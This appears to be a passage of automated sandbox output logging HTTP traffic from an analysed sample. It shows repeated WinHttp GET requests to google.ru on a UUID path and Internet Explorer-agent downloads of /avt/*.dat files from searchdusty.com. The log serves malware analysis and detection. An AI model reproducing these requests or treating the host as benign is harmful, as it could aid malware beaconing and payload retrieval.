          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt_db HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /avt/avt.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /avt/avtr.dat HTTP/1.1Accept: */*Accept-Language: enUser-Agent: Internet ExplorerHost: searchdusty.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
